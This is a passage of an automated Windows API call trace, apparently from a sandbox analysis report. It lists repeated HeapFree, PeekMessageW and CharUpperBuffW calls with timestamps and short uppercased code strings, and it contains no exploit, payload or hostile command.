hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0208.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0208.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.207] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.208] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0208.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.210] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.210] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0208.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.210] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.211] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.211] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.211] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0208.211] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.212] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0208.212] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.212] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.212] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.213] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.213] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0208.213] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.215] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.215] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0208.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0208.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.215] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.216] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0208.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: 